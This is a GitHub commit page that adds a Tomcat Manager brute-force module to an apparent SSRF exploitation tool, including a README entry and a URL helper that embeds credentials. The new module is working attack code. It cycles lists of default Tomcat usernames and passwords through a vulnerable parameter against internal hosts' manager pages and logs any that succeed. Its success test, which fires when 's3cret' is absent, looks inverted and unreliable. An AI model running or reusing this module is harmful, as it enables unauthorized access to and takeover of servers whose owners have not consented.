Skip to content

Commit

Permalink
MODULE - Tomcat module - bruteforce attack against manager
Browse files Browse the repository at this point in the history
  • Loading branch information
@swisskyrepo
swisskyrepo committed Dec 29, 2018
1 parent ec40fe1 commit e8751bb
Show file tree
Hide file tree
Showing 4 changed files with 35 additions and 1 deletion.
1 change: 1 addition & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |

## Contribute

Expand Down
4 changes: 3 additions & 1 deletion core/utils.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data)

def wrapper_http(data, ip, port):
def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
return "http://{}:{}/{}".format(ip, port, data)

def wrapper_https(data, ip, port):
Expand Down
31 changes: 31 additions & 0 deletions modules/tomcat.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
from core.utils import *
import logging

name = "tomcat"
description = "Tomcat - Bruteforce manager"
author = "Swissky"
documentation = [
"https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
"https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
]

class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "8888"
SERVER_TOMCAT = "manager/html"
tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]

def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))

# Using a generator to create the host list
gen_host = gen_ip_list(self.SERVER_HOST, args.level)
for ip in gen_host:
for usr in self.tomcat_user:
for pss in self.tomcat_pass:
payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
r = requester.do_request(args.param, payload)

if not "s3cret" in r.text:
logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
Binary file added screenshot/tomcat_example_ssrf.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit e8751bb

Please sign in to comment.